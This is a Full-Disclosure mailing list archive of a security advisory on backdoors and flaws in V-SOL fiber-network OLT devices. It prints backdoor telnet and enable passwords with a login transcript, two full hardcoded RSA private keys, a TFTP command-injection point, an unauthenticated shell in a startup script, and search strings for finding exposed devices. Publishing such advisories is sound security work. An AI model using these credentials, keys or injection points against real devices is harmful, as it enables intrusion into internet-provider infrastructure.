lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 13 Jul 2020 14:45:52 +0100
From: Pierre Kim <pierre.kim.sec@...il.com>
To: fulldisclosure <fulldisclosure@...lists.org>
Subject: [FD] Multiple vulnerabilities found in V-SOL OLTs

Hello,

Please find a text-only version below sent to security mailing lists.

The complete version on "Multiple vulnerabilities found in V-SOL OLTs"
is posted here:
  https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html


=== text-version of the advisory  ===

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512


## Advisory Information

Title: Multiple vulnerabilities found in V-SOL OLTs
Advisory URL: https://pierrekim.github.io/advisories/2020-v-sol-0x00-olt.txt
Blog URL: https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
Date published: 2020-07-14
Vendors contacted: None
Release mode: Full-Disclosure
CVE: None yet assigned



## Product Description

The V-SOL OLTs are FTTH OLTs allowing to provide FTTH connectivity to
a large number of clients (using ONTs).
Some of the devices support multiple 10-gigabit uplinks and provide
Internet connectivity to up to 1024 ONTs (clients).

We validated the vulnerabilities against V1600D4L OLT in our lab
environment with the latest firmware versions (V1.01.49).

Using static analysis, these vulnerabilities also appear to affect all
available OLT models as the codebase is similar:

- - V1600D (V2.03.69 and V2.03.57)
- - V1600D4L (V1.01.49)
- - V1600D-MINI (V1.01.48)
- - V1600G1 (V2.0.7 and V1.9.7)
- - V1600G2 (V1.1.4)

We believe these models are also vulnerable:

- - V1600D2-L
- - V1600D2
- - V1600D4
- - V1600D4-DP
- - V1600D8
- - V1600D16
- - V1600G0


For explanation about FTTH architecture, you can check my previous
research at http://pierrekim.github.io/blog/2016-11-01-gpon-ftth-networks-insecurity.html
.



## Vulnerabilities Summary

The summary of the vulnerabilities is:
1. Backdoor Access with telnet
2. Enable Backdoor
3. Hardcoded RSA keys
4. Potential command injection
5. Code quality
6. Backdoor used for account creation
7. Backdoor specific to V1600D model
8. Insecure management interfaces


## Details - Backdoor Access with telnet

A telnet server is running in the appliance and is reachable from the
WAN interface and from the FTTH LAN interface (from the ONTs).

You can find below backdoor (undocumented) credentials, giving an
attacker a low-privilege CLI access.

    login: admin
    password: !j@...$z%x6x7q8c9z)


The credentials have been extracted from firmware images:

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
Authentication process with hardcoded credentials


    $ telnet [ip]
    Trying [ip]...
    Connected to [ip].
    Escape character is '^]'.

    Hello, this is epon olt platform (version 1.00).
    Copyright 2010-2018,All Rights Reserved.


    User Access Verification

    Bad UserName or Bad Password , Login Failed.

    Please retry

    Login: admin
    Password: !j@...$z%x6x7q8c9z)

    olt> list
      enable    Turn on privileged mode command
      exit      Exit current mode and down to previous mode
      help      Description of the interactive help system
      list      Print command list
      quit      Exit current mode and down to previous mode
      show      Show running system information
      terminal  Set terminal line parameters
      vty       Virtual terminal
      who       Display who is on vty
    olt>



## Details - Enable Backdoor

It is possible to elevate the privileges using the password
`!j@...$z%x6x7q8c9z)` and to get a complete administrator CLI access:

    olt> enable
    Password: !j@...$z%x6x7q8c9z)
    olt#
      clear      Reset functions
      configure  Configuration from vty interface
      copy       Copy configuration
      disable    Turn off privileged mode command
      end        Exit current mode and down to previous mode
      exit       Exit current mode and down to previous mode
      help       Description of the interactive help system
      ip         Global IP configuration subcommands
      list       Print command list
      no         Negate a command or set its defaults
      quit       Exit current mode and down to previous mode
      show       Show running system information.
      terminal   Set terminal line parameters
      vty        Virtual terminal
      who        Display who is on vty
      write      Write running configuration to memory, network, or terminal
    olt#


With this access, an attacker can completely overwrite the
configuration as well as the firmware.

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
Hardcoded Enable password



## Details - Hardcoded RSA keys

The firmware images contain hardcoded RSA keys, used to provide SSL
encryption for the web server.

V1600D4L and V1600D-MINI:

    $ cat self.key
    -----BEGIN RSA PRIVATE KEY-----
    MIICXAIBAAKBgQDPca1RbgPDdqZ2n2m1PQ/s2IANv55GJhKF9CtkMIEpHEhbTixH
    pcNE02oQoJFTK5EL21A3JftekVk3DCKK68ncIJAAWmzJp63QpEovZr9ySQubkk39
    /+kHxsfkUmR3SldyLctaT+o7qAy4W/BM6tp00mXWKhFHerXmABf/vGt89QIDAQAB
    AoGAe3cvLs4J02ZlASk0Iziqp87buFMaAqpaT/vZb5Im7a71qdJHLIWOSQKDmE3Y
    8OV3ONVZUtl6WPitXsQMMx7PTvCELDvNMGmGJ31zOpE1zXl8vlh5QQzTfLZxjE1r
    SfWXoYNUcV4uiOfXNgJaOBzz4l8W8CjE6TyDF0DD3WsdQMECQQDpTMo5VD9ifaoW
    r1nahaaVTPyTyd7GQgO7jyXIdlZ+mL0G8xUF6CnIw1G3kG+6l4oLsAqpj2SIFOcn
    rz/Zxq89AkEA46DZRloNL6hNEWZvL9dboqp/7f4sILItE6WfANsqM5oeIPA1T3ge
    nYK5VwU2Jm4N3oaLq9fPfESWtAC/5FvgGQJAGcthuID2GR+nxKZSmvSX/H3slzKE
    rQrzerNTDBz5Zznf/Hq34lVO+WGPEWqoz8qderlWFHVEOj+FZz/bIWr0SQJAJk6K
    YhmDgJKtLZF0grOWW0CgONf+ax4xEc5cfNNlPbvg+CAUiKQpWs6GDEv3Oe5pbRpt
    ZOTzqPEN/4rkwDRp+QJBAOZUwGwi3pHU8T9K15qR1Em/o+buRoc8hFyyv1CSmAWZ
    uXFnRzbruUlQ6/lMF3MU7U4TTOD7tnhOVq1Ub+Rgnzs=
    -----END RSA PRIVATE KEY-----
    $ cat self.crt
    -----BEGIN CERTIFICATE-----
    MIICkDCCAfmgAwIBAgIJALvknsR/6Fr2MA0GCSqGSIb3DQEBBQUAMGExCzAJBgNV
    BAYTAi4uMQswCQYDVQQIDAIuLjELMAkGA1UEBwwCLi4xCzAJBgNVBAoMAi4uMQsw
    CQYDVQQLDAIuLjELMAkGA1UEAwwCLi4xETAPBgkqhkiG9w0BCQEWAi4uMB4XDTE4
    MDcyNjA5MDEwMloXDTIxMDcyNTA5MDEwMlowYTELMAkGA1UEBhMCLi4xCzAJBgNV
    BAgMAi4uMQswCQYDVQQHDAIuLjELMAkGA1UECgwCLi4xCzAJBgNVBAsMAi4uMQsw
    CQYDVQQDDAIuLjERMA8GCSqGSIb3DQEJARYCLi4wgZ8wDQYJKoZIhvcNAQEBBQAD
    gY0AMIGJAoGBAM9xrVFuA8N2pnafabU9D+zYgA2/nkYmEoX0K2QwgSkcSFtOLEel
    w0TTahCgkVMrkQvbUDcl+16RWTcMIorrydwgkABabMmnrdCkSi9mv3JJC5uSTf3/
    6QfGx+RSZHdKV3Ity1pP6juoDLhb8Ezq2nTSZdYqEUd6teYAF/+8a3z1AgMBAAGj
    UDBOMB0GA1UdDgQWBBTDWRDTYuzjtF3+rk0jaBTKRIMtXjAfBgNVHSMEGDAWgBTD
    WRDTYuzjtF3+rk0jaBTKRIMtXjAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUA
    A4GBAJgxXbMJQYEXOvrP5PcCUkq16o5bt83x3xCkZ9+Yv7cnCRsRBAgXSMyorOMl
    +Ttt3CSTNp5jwHcDhysth4V5/SSkJ46DkUmID2WzzxIjL82MOYAv/na6QTGNUAcz
    7VLEX/QuBzS7jLczZ9WtOrgZ0ma2TjIZJOpT32guKZYeyL+r
    -----END CERTIFICATE-----


V1600D, V1600G1 and V1600G2:

    $ cat usr/sbin/self.key
    -----BEGIN RSA PRIVATE KEY-----
    MIICXQIBAAKBgQDQYaaee6igp8RpOXUq+82WUOXm8pSjIXBj6U9RRki9kLcu8vV/
    80g/vdyPdartkhvG7tG5kJLSZ464+uDNbZpnEk4LZbN9vAY8rgmc/2SFYFYiKb82
    bcKpV6e4EuCXc0VPC27zlywikVFHg2g9Dva6bnuPqXj+JRUNK/ER4PADTwIDAQAB
    AoGAC0Mb1DjutjAbB2zZjkcpp1Qb+M1nhyGJh3zWkpfv2n71x43OAupNH1TNlNtR
    L6HT6n6ByzurE8AREKJOgAvKamqiyPM8kPZKFEeBqqDOhm3ZXOsjsS5okpzMR4H4
    CHbJO8dm1siM3fKG2UdrSGiwJw27wB1NRRcocQkcixIez9ECQQD5XTxUhe/CGPAF
    AA4q8srNvkG5oRd1eVLr6cyoEzbqwd3VnVHUzIn3fBYul1T3pZUkNF9RrmFENPTA
    Sf5P+DBtAkEA1e05mYZLa8IJnlgvGlLZn8Mvwpy5fNuMrEqwtiWFn6naG8FIwosR
    7FBdQWfUlCslu2dKSTx9n9x3tkV9w2zFKwJBANWrinJygcqzS5c9QOaUPCqnh/Hj
    kxJZ7y+ummq6bCgkDk1oDCJnUSD69pbdnTTGcVEgfzyiSz4CkmXiAUPMytECQE+c
    YbQdgxHN+xBfVuAf9vb6h1qQQoMRnU882HhgjFK3vgBYNMCZSok7+whtIHIngHo2
    XTHV/hYw0KgXQk8oulMCQQDJD7WusXmuND+PQp24/t19d/FyhITHc/CDwsKN6tW0
    8WfkCwMgDBqDiBtBd/S2gs6yJVpaP3HKE+Sl5cB4mPVK
    -----END RSA PRIVATE KEY-----
    $ cat usr/sbin/self.crt
    -----BEGIN CERTIFICATE-----
    MIICkDCCAfmgAwIBAgIJAOkwF33vgssHMA0GCSqGSIb3DQEBBQUAMGExCzAJBgNV
    BAYTAi4uMQswCQYDVQQIDAIuLjELMAkGA1UEBwwCLi4xCzAJBgNVBAoMAi4uMQsw
    CQYDVQQLDAIuLjELMAkGA1UEAwwCLi4xETAPBgkqhkiG9w0BCQEWAi4uMB4XDTE4
    MDcyNzA4MTMxNVoXDTIxMDcyNjA4MTMxNVowYTELMAkGA1UEBhMCLi4xCzAJBgNV
    BAgMAi4uMQswCQYDVQQHDAIuLjELMAkGA1UECgwCLi4xCzAJBgNVBAsMAi4uMQsw
    CQYDVQQDDAIuLjERMA8GCSqGSIb3DQEJARYCLi4wgZ8wDQYJKoZIhvcNAQEBBQAD
    gY0AMIGJAoGBANBhpp57qKCnxGk5dSr7zZZQ5ebylKMhcGPpT1FGSL2Qty7y9X/z
    SD+93I91qu2SG8bu0bmQktJnjrj64M1tmmcSTgtls328BjyuCZz/ZIVgViIpvzZt
    wqlXp7gS4JdzRU8LbvOXLCKRUUeDaD0O9rpue4+peP4lFQ0r8RHg8ANPAgMBAAGj
    UDBOMB0GA1UdDgQWBBQIoRN/VYOmUzwPXlHCZrZi4XPv4zAfBgNVHSMEGDAWgBQI
    oRN/VYOmUzwPXlHCZrZi4XPv4zAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUA
    A4GBAB0bY8gSse39BwzXtXnzSOpln0CIwjr3xI7nLvzGhf4Xooktf9zDTQBONOzh
    eRjSLluVJl9kYIBY4j2Y5nbSwjaWD0Imaa6z5FBro0e3SyGq84tlZyFW8SijdFLC
    jN04hXrqdov/ATL6QCaHlGzbPMG4KBiPfwAiiYVlRL3B0vJN
    -----END CERTIFICATE-----



## Detail - Potential command injection

It is possible to use TFTP to transfer some files:

    upload tftp syslog <filename> <A.B.C.D>
    upload tftp configuration <filename> <A.B.C.D>

This is vulnerable to a command injection, allowing to run commands as root.

The function starting the tftp process using system(3) will use the
argument provided by the attacker, as shown below:

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
TFTP command injection



## Detail - Code quality

In the firmware image of V1600D4L and V1600D-MINI, we can find the
following inside the `init.sh` script:

    $ cat init.sh
    #!/bin/sh
    [...]
    ifconfig eth0 0.0.0.0
    ifconfig eth0 up
    [...]

    telnetd -l /bin/sh&

During the update, the script appears to start telnetd without authentication.



## Backdoor used for account creation

The string `4ef9cea10b2362f15ba4558b1d5c081f` is being compared with
an input value in the function used to create new users.

The code will check if the user is `admin` or if the backdoor password
`4ef9cea10b2362f15ba4558b1d5c081f` is provided.

It appears it is being used to create admin users from non-admin users.

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
Creation of new user, using a `backdoor` password

Due to time constraints, we did not study this backdoor in depth.



## Backdoor specific to V1600D model

This backdoor appeared in version 2.03.69.

The string `K0LTdi@...s312$` is being compared with the password
provided by the the remote attacker. If it matches, the access will be
provided.

[please use the HTML version at
https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html
to see the image]
Authentication process with hardcoded credentials

Due to time constraints, we did not study this backdoor in depth.



## Details - Insecure management interfaces

By default, the appliance can only be managed remotely with HTTP,
HTTPS, telnet and SNMP. Some devices may support SSH. Furthermore, SSL
is using hardcoded keys. An attacker can intercept passwords sent in
clear-text and MITM the management of the appliance.



## Dorks

"Hello, this is epon olt platform (version 1.00)."
"Copyright 2010-2018,All Rights Reserved."



## Vendor Response

Full-disclosure is applied as we believe some backdoors are
intentionally placed by the vendor.



## Report Timeline

* Dec 29, 2019: Vulnerabilities found and this advisory was written.
* Jul 14, 2020: A public advisory is sent to security mailing lists.



## Credits

These vulnerabilities were found by Pierre Kim (@PierreKimSec) and
Alexandre Torres (@AlexTorSec).



## References

https://pierrekim.github.io/advisories/2020-v-sol-0x00-olt.txt

https://pierrekim.github.io/blog/2020-07-14-v-sol-olt-0day-vulnerabilities.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAl8MX4oACgkQxD4O2n2T
LbymnBAArmUCDEI/WHC5ch31YfXxEhSZOTD1l5GOD7osIixteXT67jCns5EGdhBJ
Lq66KLdjzG+60jhj1N/YHuZBupvF4ChtnTId/UYSjuvys8J17f6VweqsazxebYac
WOcmBwN9Tqw20Bjhmqff3y2qaQ6YpfbkuiPciddLTUT1OGvM8b0wuUDF2grb5KLT
cKJoFW//RaX9eQCZaB/5RoZIv06hZZSx2930ijOfC5kRqoVex5FkhV1dEzA4PBIM
TV/lkYWnOxb6xO6GYwLFGq0xe4qVjd+En34ixgUMhBxsJAQ4HsNGInCgJZfitJKv
0GgNlP5FRtVU+T7kk0e+Bmwl/vAmF3IbCEUacQoW08cahpiqHIJEIKzV+wdYrjlv
q40Ia8pUHwcFEe5UyWn1+yxTU2WslAZQCbXoD0FYrzN6AhgctyZR5kfotSjycGU5
GqxPV7j9HJqahf5rLutbF07onbOxXyU/YwLPx3kbHs3yJ68a1XKZox5o0B3NT/BU
GEUlKnp5C2sZmNXMmdW7bh/MODIgAdK4vfjRgJP77QyHjCed1twqmEFTZ/fy5k+I
gMZCzi/EZhuOAoRximq7Qoxn3TvedmTorCtUrbClMEijQ8weuSxKCUK+joPGmkmv
I46u4GKyS2wmm+2DfQmxSXTZKX689YckXAihgr7bpSDk3yBz12w=
=DOib
-----END PGP SIGNATURE-----

-- 
Pierre Kim
pierre.kim.sec@...il.com
@PierreKimSec
https://pierrekim.github.io/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists